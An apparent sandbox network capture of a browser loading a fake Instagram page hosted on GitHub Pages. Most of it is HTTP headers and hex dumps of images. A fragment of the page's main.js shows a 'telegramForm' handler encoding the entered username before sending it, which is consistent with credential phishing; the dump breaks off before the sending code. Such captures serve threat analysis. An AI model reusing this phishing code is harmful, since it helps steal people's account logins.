                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1369INData Raw: 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 32 64 65 67 29 7d 34 30 25 2c 74 6f 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 30 64 65 67 29 7d 7d 40 6b 65 79 66 72 61 6d 65 73 20 66 61 2d 73 68 61 6b 65 7b 30 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 2d 31 35 64 65 67 29 7d 34 25 7b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 72 6f 74 61 74 65 28 31 35 64 65 67 29 7d 38 25 2c 32
                                                                                                                                                                                                                                Data Ascii: -transform:rotate(12deg);transform:rotate(12deg)}40%,to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes fa-shake{0%{-webkit-transform:rotate(-15deg);transform:rotate(-15deg)}4%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}8%,2


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                6192.168.2.449741185.199.110.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC631OUTGET /instagram.com/img/apple-button.png HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC737INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 3754
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                x-origin-cache: HIT
                                                                                                                                                                                                                                Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                ETag: "669df693-eaa"
                                                                                                                                                                                                                                expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=600
                                                                                                                                                                                                                                x-proxy-cache: MISS
                                                                                                                                                                                                                                X-GitHub-Request-Id: 2B52:16F5:110D28E:13927BD:66F8DD2D
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:03 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                Age: 61
                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740045-EWR
                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                                                                                                X-Timer: S1727585643.107571,VS0,VE1
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: dea1f0b3e7927f8f91a9cb01508f25b00c6a4db0
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 32 00 00 00 5a 08 03 00 00 00 0c c8 2a 74 00 00 01 8c 50 4c 54 45 00 00 00 a6 a6 a6 a6 a6 a6 a5 a5 a5 a6 a6 a6 a6 a6 a6 a6 a6 a6 a6 a6 a6 a5 a5 a5 a4 a4 a4 a4 a4 a4 a4 a4 a4 a6 a6 a6 a5 a5 a5 a6 a6 a6 a7 a7 a7 a7 a7 a7 a6 a6 a6 a0 a0 a0 63 63 63 2e 2e 2e 0f 0f 0f 00 00 00 02 02 02 12 12 12 37 37 37 6d 6d 6d a6 a6 a6 a5 a5 a5 a5 a5 a5 72 72 72 1d 1d 1d 83 83 83 5c 5c 5c 05 05 05 89 89 89 a6 a6 a6 29 29 29 80 80 80 4b 4b 4b 1f 1f 1f 32 32 32 90 90 90 d6 d6 d6 fb fb fb 40 40 40 0c 0c 0c 17 17 17 24 24 24 c0 c0 c0 ff ff ff 62 62 62 9e 9e 9e 9c 9c 9c 8c 8c 8c 6b 6b 6b 30 30 30 60 60 60 df df df 86 86 86 fd fd fd 46 46 46 b3 b3 b3 d3 d3 d3 a3 a3 a3 5b 5b 5b 50 50 50 68 68 68 f7 f7 f7 bf bf bf ad ad ad 93
                                                                                                                                                                                                                                Data Ascii: PNGIHDR2Z*tPLTEccc...777mmmrrr\\\)))KKK222@@@$$$bbbkkk000```FFF[[[PPPhhh
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 9b 67 12 aa 4b 26 c7 79 0b 48 64 87 fe 96 da 01 74 b0 e1 81 b3 18 a7 32 c0 a3 ca c9 1e f4 b5 30 05 cc 32 7d 99 92 df d2 a1 65 ef 84 f0 a6 38 d9 07 08 fd e4 8c b5 64 8d 5a b2 6b ae 38 34 e1 9f 91 ac 91 dc ea 4a 01 55 26 73 90 4d 00 ce 73 4d 9c e4 2a 80 56 de b5 b1 13 3e 3a 7a 39 57 21 d9 37 7d 63 9a 64 42 42 8c 7c 03 e0 20 9b 4c de 64 0f 84 0e 53 32 31 d2 00 21 49 2a d5 24 9b e4 a7 9f 78 5c b6 f8 7d 49 af d1 7c e3 b1 9a cc 36 94 5b 89 d1 45 f7 03 20 dd 32 ad 02 90 4e 79 ed b6 c1 ce 8f a3 13 a8 90 4c 7a cb 5d 19 b8 09 70 10 78 20 d7 81 6e 66 93 e1 90 1b 37 40 2c 6e 4e 16 64 68 11 90 3f 32 2e 57 48 f6 89 d7 e5 c9 d6 c9 d5 97 4c 66 fb dc 70 1e e0 c6 ca d0 7b 18 d4 e4 e4 01 85 d0 ee d0 c2 73 c9 6e 7b a2 c7 9b a4 d7 06 21 76 c0 d3 48 f8 07 d9 69 6c b2 c7 5a 22
                                                                                                                                                                                                                                Data Ascii: gK&yHdt202}e8dZk84JU&sMsM*V>:z9W!7}cdBB| LdS21!I*$x\}I|6[E 2NyLz]px nf7@,nNdh?2.WHLfp{sn{!vHilZ"
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC998INData Raw: 61 97 e4 44 4d c9 3c 21 5a d6 fa d4 69 b7 74 63 8e 97 42 d4 9c ec 10 79 cb 14 3a 8c 77 35 5e f2 3f 37 82 32 2d 8e 00 b3 d6 cc c9 cc 99 c3 25 5f 19 96 8d 8d fe e4 89 93 f5 07 35 25 c3 00 ad ba b5 be 20 a6 a5 c7 93 f9 28 04 8d 64 a6 81 cf 46 e8 32 37 bd 14 42 9e f2 64 5e f3 0b a1 c3 98 5c a1 30 09 dd 0c cb c4 6b 4b d6 ef a6 45 ab 55 ec 76 ef 9f 48 d6 53 55 32 d8 33 14 3a cb 93 bd 2b 49 e6 30 26 57 28 34 3e 71 05 c5 de df 74 19 cb 75 35 bb 90 60 79 32 d3 e7 af 3c d9 19 85 ae 27 4e d0 76 94 27 9b a5 30 5d f2 c5 b4 a3 2c 59 1b 85 33 c5 6c b8 c6 64 9e 0c ad d8 5f 40 05 2e 0a b7 4b 86 30 85 b8 54 48 76 82 bc 2f 45 2b f4 31 f2 7e a3 30 83 47 85 29 f4 94 27 d3 12 6d 23 ef 96 82 bf 2c 59 d2 ea 49 52 eb c9 30 43 2b 7a 9e 3e b9 15 81 41 ce 50 f8 5a 48 76 57 18 4a 53
                                                                                                                                                                                                                                Data Ascii: aDM<!ZitcBy:w5^?72-%_5% (dF27Bd^\0kKEUvHSU23:+I0&W(4>qtu5`y2<'Nv'0],Y3ld_@.K0THv/E+1~0G)'m#,YIR0C+z>APZHvWJS


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                7192.168.2.449744185.199.110.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC636OUTGET /instagram.com/img/googleplay-button.png HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                Referer: https://sayidanur.github.io/instagram.com/
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC719INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 10071
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                ETag: "669df693-2757"
                                                                                                                                                                                                                                expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=600
                                                                                                                                                                                                                                x-proxy-cache: MISS
                                                                                                                                                                                                                                X-GitHub-Request-Id: B5A6:56A91:1FA78B1:23A3592:66F8DD2E
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:03 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                Age: 61
                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740063-EWR
                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                                                                                                X-Timer: S1727585644.773883,VS0,VE4
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: e1aaac2ee9a1fb7a845dca4108fd488bed167418
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 02 34 00 00 00 a8 08 06 00 00 00 f7 b0 74 12 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 09 70 48 59 73 00 00 2e 23 00 00 2e 23 01 78 a5 3f 76 00 00 00 07 74 49 4d 45 07 e0 04 14 14 11 16 4c 49 4a c7 00 00 00 06 62 4b 47 44 00 ff 00 ff 00 ff a0 bd a7 93 00 00 26 21 49 44 41 54 78 da ed 9d 0b 94 14 d5 99 c7 3b 71 54 04 24 83 82 12 45 19 04 71 78 c9 88 23 22 28 a2 88 02 22 21 e2 9a 75 25 c8 9a 95 43 30 0a 1b 44 d1 04 c4 cd 72 c0 28 ca 6b a3 49 60 f5 b8 89 21 bb 47 31 d1 18 4d 7c e0 fb 89 82 8a 3c e5 25 22 20 f2 1a 95 18 62 be ad 7f 33 35 29 8a ea aa 7b ab 6e 55
                                                                                                                                                                                                                                Data Ascii: PNGIHDR4tgAMAa cHRMz&u0`:pQ<pHYs.#.#x?vtIMELIJbKGD&!IDATx;qT$Eqx#"("!u%C0Dr(kI`!G1M|<%" b35){nU
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: a6 f2 55 fc 84 a6 58 c7 54 48 66 ea ea ea e4 a1 87 1e f2 14 14 e4 ad dc 72 cb 2d 79 b9 81 8c b8 a3 2d 7e 52 53 48 4a 11 19 d2 8d f0 50 68 08 a1 d0 84 8f ce 7c 7f 8a 34 7a 49 24 f7 82 ec 97 9a b7 16 78 ca 4c b3 d5 37 c8 91 ab 27 c8 91 6b 26 48 8b b5 37 4b af 4d 77 4b 8f 27 6e 92 23 da 1d cb 8b 20 63 3c fa e8 a3 07 45 5b 54 87 1f 00 3a 46 74 66 90 19 ec 2b ac 10 98 c2 1d 29 89 9a 93 62 e2 f8 e3 3c 26 c8 d1 67 9f 7d d6 b0 6f fc 7d fd fa f5 4a c9 b6 f6 30 23 f2 81 dc 32 5b 68 08 c9 d9 06 c8 9f 72 6e 10 37 0a 0d 21 14 9a 44 a8 fa d9 9f 24 f7 62 bd d0 d4 4b 4d e3 b7 17 14 94 99 a6 1f 58 ac 9d 20 4d d6 4d 90 e3 36 4e 96 be 5b e6 48 f5 ac ef 32 bf 26 23 20 fa e2 cc b9 40 67 88 a8 4b 98 99 2f 41 32 43 a1 31 7f 4c 5e e7 0f 82 a3 7b fe ae bd f6 da 83 a4 a6 d0 f9 74
                                                                                                                                                                                                                                Data Ascii: UXTHfr-y-~RSHJPh|4zI$xL7'k&H7KMwK'n# c<E[T:Ftf+)b<&g}o}J0#2[hrn7!D$bKMX MM6N[H2&# @gK/A2C1L^{t
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: f2 6b ba fc 61 2c f3 6b 12 18 7a 72 3e 39 db 9d 15 a2 2c 48 ee 74 77 6e 18 4a 40 02 29 3a 42 67 65 58 5b 66 ae bd f6 5a a5 ce 50 75 e9 03 9d e5 0f ca 4d 68 70 6e bc 84 01 c7 87 22 79 38 7f 5e 11 b5 7b ee b9 27 ff 3b 4e 19 c2 86 73 ea 27 43 61 da c0 1d 49 a2 d0 10 42 a1 89 ce 5b 12 8b d4 e4 2c a9 31 29 33 4e 5a ec be 4d 7a d6 cd 65 7e 4d 8c a0 53 44 02 a7 3b 52 63 77 5a e8 8c 9c b5 66 f0 ff ee 8e 10 1b ea d4 14 92 99 28 85 f5 b0 41 0a 28 34 fe 52 e3 75 4e 20 9c ce f3 87 da 40 ee 29 d5 f6 86 61 c3 a0 c8 4e d8 36 70 d7 a6 a1 d0 10 42 a1 89 c6 db 12 9f d4 ac 8b 4f 6a 40 be 7e cd 96 bb 99 5f 13 23 78 6a df b3 67 4f 28 e1 40 e7 16 54 0b 85 42 13 8f d0 d8 52 83 e1 27 dd 6a ce 76 b2 2e 84 48 65 98 2a 6c 1b e0 f8 dc c7 46 a1 21 84 42 13 4d 68 4a 58 6a 90 38 8c fc
                                                                                                                                                                                                                                Data Ascii: ka,kzr>9,HtwnJ@):BgeX[fZPuMhpn"y8^{';Ns'CaIB[,1)3NZMze~MSD;RcwZf(A(4RuN @)aN6pBOj@~_#xjgO(@TBR'jv.He*lF!BMhJXj8
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 1f a9 41 12 6e 18 d9 b0 a7 5c eb 44 50 20 4e 10 1f d5 f7 cb ea d4 5c 42 a1 49 ab d0 60 f3 cb a9 a1 d0 50 68 8a 2f 34 19 96 9a bc cc 3c 5b 2f 33 69 12 9a d5 39 a9 5b 51 93 ea 9c 9a 30 c3 4c c8 6d 89 3a 13 09 ef 8b c8 8d 9f d8 50 66 28 34 14 9a e8 c2 80 ef 1a 1e 3c f0 bd d5 19 ea a5 d0 50 68 d2 f9 01 56 4b 66 a5 26 2f 33 cf 58 32 f3 54 2e 95 42 23 6b 2b 65 ec f7 d2 3b f4 a4 93 00 ac 3b 1b 22 4a 12 32 65 86 50 68 cc 0b 03 1e 44 54 1f 60 0a 7d 07 29 34 14 9a e2 0b 4d 06 a5 a6 41 66 fe 9c 4b af d0 ac c9 c9 4f 6f 49 e7 b0 13 a6 46 eb 44 65 e2 3c 16 dc 3c 29 33 84 42 93 8c 30 a8 44 6b 50 a7 86 42 43 a1 49 af d0 64 48 6a ee bf ee a7 b2 73 78 6f 91 47 2b 52 2f 34 93 ae 4b df 90 13 9e d4 4c 4f e7 34 91 98 4c 99 21 14 9a 64 84 41 25 52 e3 15 91 a5 d0 50 68 8a cb 1a
                                                                                                                                                                                                                                Data Ascii: An\DP N\BI`Ph/4<[/3i9[Q0Lm:Pf(4<PhVKf&/3X2T.B#k+e;;"J2ePhDT`})4MAfKOoIFDe<<)3B0DkPBCIdHjsxoG+R/4KLO4L!dA%RPh
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: d4 3d 97 93 15 0f e5 64 e2 bf 96 66 9e 0c 85 26 5c 67 66 4f 09 b5 c1 53 97 6e de 85 8a 38 e8 de d8 ed d9 1c ce 63 c3 ff eb 7e 3e d5 44 4d dd bc 05 f7 b1 a9 14 6e 4c 42 68 74 8e c3 9e 25 06 99 c3 7b 22 82 81 ff 57 6d 63 d3 89 c2 2a f2 ac 13 c5 0c 73 2d fb e5 d3 85 b9 d6 74 44 ca 9e 32 0f 70 4e ec 6b 5e e7 7b e3 ce fd c1 3d 21 e8 f5 61 72 08 55 1e 00 d2 b8 c0 6f e9 0b 4d 0a a5 e6 17 63 67 c8 17 96 cc 80 a2 48 cd 33 15 0d 42 b3 f7 85 9c 6c 7e 3c 27 73 6f 2c dd 3c 99 72 14 1a af 9b 85 ea 90 89 d7 d4 62 af 4e 5e 75 5a a9 ca 92 11 aa fb 42 67 1a 74 23 44 c7 ab da 51 61 7f 41 c3 23 aa fb c2 67 f0 13 24 7b d6 56 b1 84 46 35 3f 04 e7 2b a8 8d f1 73 95 8e d4 64 3e 4d b1 b7 a0 21 d4 30 42 03 d9 57 19 f6 09 6a 47 d5 f3 e1 15 15 09 92 2a ec d7 74 32 70 5a 0b 95 66 43
                                                                                                                                                                                                                                Data Ascii: =df&\gfOSn8c~>DMnLBht%{"Wmc*s-tD2pNk^{=!arUoMcgH3Bl~<'so,<rbN^uZBgt#DQaA#g${VF5?+sd>M!0BWjG*t2pZfC
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 35 1b 6b ce 97 67 3b f6 94 7f 6b 79 02 65 c5 e0 d4 5e d3 09 b4 71 15 8a 73 de 6c 38 e4 14 cf 90 93 c9 1b 74 b1 87 9c 8a 95 e4 4b a1 d1 5b f2 03 6d 5f e8 33 e2 df f1 73 d5 29 f5 51 27 1d 38 ef 83 ba 09 f7 14 9a a4 84 26 26 a9 f9 2f 4b 66 76 d4 cb 4c 9c 52 f3 f1 69 fd e4 8d ce bd e5 47 c7 b7 97 6f 1c 72 28 45 25 a6 1a 31 c5 fa 72 86 ad a7 c2 a4 60 fd a4 e0 20 71 34 19 ad f3 6b b3 34 08 0d 8e 2f 0d c3 ad 59 13 1a 95 48 08 be ef ba 0f 51 78 9f a0 28 6e d4 72 02 ce 3c bd a0 e8 76 9a f2 0f cb 4f 68 0c 4b 4d 5e 66 4e bd c4 62 70 6c 52 f3 c9 69 17 ca d2 2e 7d 64 4e 9b ce cc 93 49 20 4a 53 ac 85 d5 54 a6 d0 7a e5 33 98 2a aa 56 8c 69 db a6 64 4b f7 29 52 45 b6 4c 5d 03 7e 6d 96 c4 b4 ed 42 1d 16 44 28 4d 25 ea b3 26 34 2a a2 19 f6 33 85 9d b6 ad f3 5d b6 8f 2d e8
                                                                                                                                                                                                                                Data Ascii: 5kg;kye^qsl8tK[m_3s)Q'8&&/KfvLRiGor(E%1r` q4k4/YHQx(nr<vOhKM^fNbplRi.}dNI JSTz3*VidK)REL]~mBD(M%&4*3]-
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 9f 38 ee 53 14 1a 55 3e 14 6d a9 99 79 fd 6c d9 0c 99 b1 d1 94 9a 75 9d 06 c9 8b 27 9f 27 b7 b5 ea cc 3c 99 0c 89 4d 1c d1 0e d5 d9 26 26 96 7b 30 71 fc b8 89 9a ac 9c 1c 76 06 47 12 9d 2c ce 7b 94 08 87 53 ae 8a 29 34 ba b3 c2 a2 cc c8 a1 d0 f4 0d bc de a3 e4 37 e1 b5 f6 35 1e 87 d0 a8 94 7e 28 c5 a9 da d9 12 1a 0d a9 99 79 1d 64 e6 db f5 e8 49 cd a6 ce 83 e5 f5 0e fd e4 9e d6 dd a5 53 a3 66 94 81 8c 61 d7 90 89 9a 70 89 8e 0e 9d 6f d2 eb e9 e0 f8 21 36 61 22 36 71 af c6 8c 9b 24 c4 46 37 62 83 b6 44 04 22 ce 9b 2c 3e b7 ce 39 b7 cf af 53 ae 74 e5 04 d2 88 7f 2f 44 d8 21 35 dd cf e2 3c c6 24 f2 26 fc 3e b3 69 99 2e e6 f1 e9 9e 07 7c 67 dd f7 0b 5c 03 7e c7 12 c7 70 6b 29 16 d2 cb a6 d0 28 48 0d 64 e6 a3 ea 6f e7 d1 91 9a cd 9d 86 c8 d2 53 2e 92 ff 6d 73
                                                                                                                                                                                                                                Data Ascii: 8SU>mylu''<M&&{0qvG,{S)475~(ydISfapo!6a"6q$F7bD",>9St/D!5<$&>i.|g\~pk)(HdoS.ms
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC425INData Raw: 52 43 08 21 84 90 34 00 07 81 8b b8 d2 62 de 76 fb cb 41 42 83 a1 27 77 82 30 a5 86 10 42 08 21 c5 48 02 76 cb cc 8c 19 33 be 70 bb 8b a7 d0 80 e1 c3 87 7f c7 9d 4f 83 1d 32 a7 86 10 42 08 21 c5 c8 99 b1 65 06 81 17 65 a1 29 24 35 f6 ec 27 4e e9 26 84 10 42 48 5c 51 19 77 ad 19 80 d1 23 b8 49 21 6f 29 28 34 b6 d4 b8 87 9f 9c c5 f7 58 51 98 10 42 08 21 a6 12 7f 27 4d 9a 24 5e ce e1 17 99 51 12 1a 3b a7 c6 9d 28 ec 04 73 c2 21 37 58 a5 1b 82 03 18 c1 21 84 10 42 48 a1 24 5f db 17 e0 0e 18 f9 71 e7 c9 b8 13 80 83 64 46 49 68 9c 53 ba bd 86 a0 08 21 84 10 42 4c 83 11 22 f7 d4 6c 23 42 63 47 6b 50 51 b8 d0 30 14 21 84 10 42 48 54 91 41 10 45 c7 4f b4 85 c6 09 16 b4 c4 2a dd 94 1b 42 08 21 84 44 01 39 32 18 5a f2 4b fa 8d 4d 68 dc 91 1b 84 85 60 54 88 e0 10 42
                                                                                                                                                                                                                                Data Ascii: RC!4bvAB'w0B!Hv3pO2B!ee)$5'N&BH\Qw#I!o)(4XQB!'M$^Q;(s!7X!BH$_qdFIhS!BL"l#BcGkPQ0!BHTAEO*B!D92ZKMh`TB


                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                8192.168.2.449745185.199.109.1534432992C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC364OUTGET /instagram.com/main.js HTTP/1.1
                                                                                                                                                                                                                                Host: sayidanur.github.io
                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC767INHTTP/1.1 200 OK
                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                Content-Length: 3212
                                                                                                                                                                                                                                Server: GitHub.com
                                                                                                                                                                                                                                Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                permissions-policy: interest-cohort=()
                                                                                                                                                                                                                                x-origin-cache: HIT
                                                                                                                                                                                                                                Last-Modified: Mon, 22 Jul 2024 06:05:07 GMT
                                                                                                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556952
                                                                                                                                                                                                                                ETag: "669df693-c8c"
                                                                                                                                                                                                                                expires: Sun, 29 Sep 2024 05:03:02 GMT
                                                                                                                                                                                                                                Cache-Control: max-age=600
                                                                                                                                                                                                                                x-proxy-cache: MISS
                                                                                                                                                                                                                                X-GitHub-Request-Id: 2C5C:140E5B:2C4849A:318CE8C:66F8DD2D
                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                Date: Sun, 29 Sep 2024 04:54:03 GMT
                                                                                                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                                                                                                Age: 61
                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740062-EWR
                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                                                                                                X-Timer: S1727585644.775245,VS0,VE1
                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                X-Fastly-Request-ID: 3284512f31802bed6ef59f8e900ae7919880707f
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: 64 6f 63 75 6d 65 6e 74 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 66 6f 72 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 74 65 6c 65 67 72 61 6d 46 6f 72 6d 27 29 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 6c 6f 61 64 69 6e 67 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6c 6f 61 64 69 6e 67 27 29 3b 0d 0a 20 20 20 20 63 6f 6e 73 74 20 76 61 6c 69 64 54 65 78 74 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 22 2e 69 6e 76 61 6c 69 64 22 29 20 0d 0a 20 20 20 20 6c 65 74 20 74 72 79 43 6f 75 6e 74 20 3d 20 30 3b 20 2f 2f 20
                                                                                                                                                                                                                                Data Ascii: document.addEventListener('DOMContentLoaded', () => { const form = document.getElementById('telegramForm'); const loading = document.getElementById('loading'); const validText = document.querySelector(".invalid") let tryCount = 0; //
                                                                                                                                                                                                                                2024-09-29 04:54:03 UTC1378INData Raw: b4 d0 b5 d1 80 d0 b6 d0 ba d0 b0 20 d0 bf d0 b5 d1 80 d0 b5 d0 b4 20 d0 be d1 82 d0 bf d1 80 d0 b0 d0 b2 d0 ba d0 be d0 b9 20 d0 b4 d0 b0 d0 bd d0 bd d1 8b d1 85 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 74 49 6e 74 65 72 76 61 6c 28 28 29 20 3d 3e 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6c 6f 61 64 69 6e 67 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 20 3d 20 27 66 6c 65 78 27 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 2c 20 35 30 30 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 74 20 65 6e 63 6f 64 65 64 55 73 65 72 6e 61 6d 65 20 3d 20 65 6e 63 6f 64 65 55 52 49 43 6f 6d 70 6f 6e 65 6e 74 28 75 73 65 72 6e 61 6d 65 2e 76 61 6c 75 65 29 3b 0d 0a 20 20 20 20
